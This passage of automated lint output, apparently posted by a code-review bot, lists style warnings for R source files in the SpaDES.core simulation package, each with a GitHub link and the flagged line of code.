simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        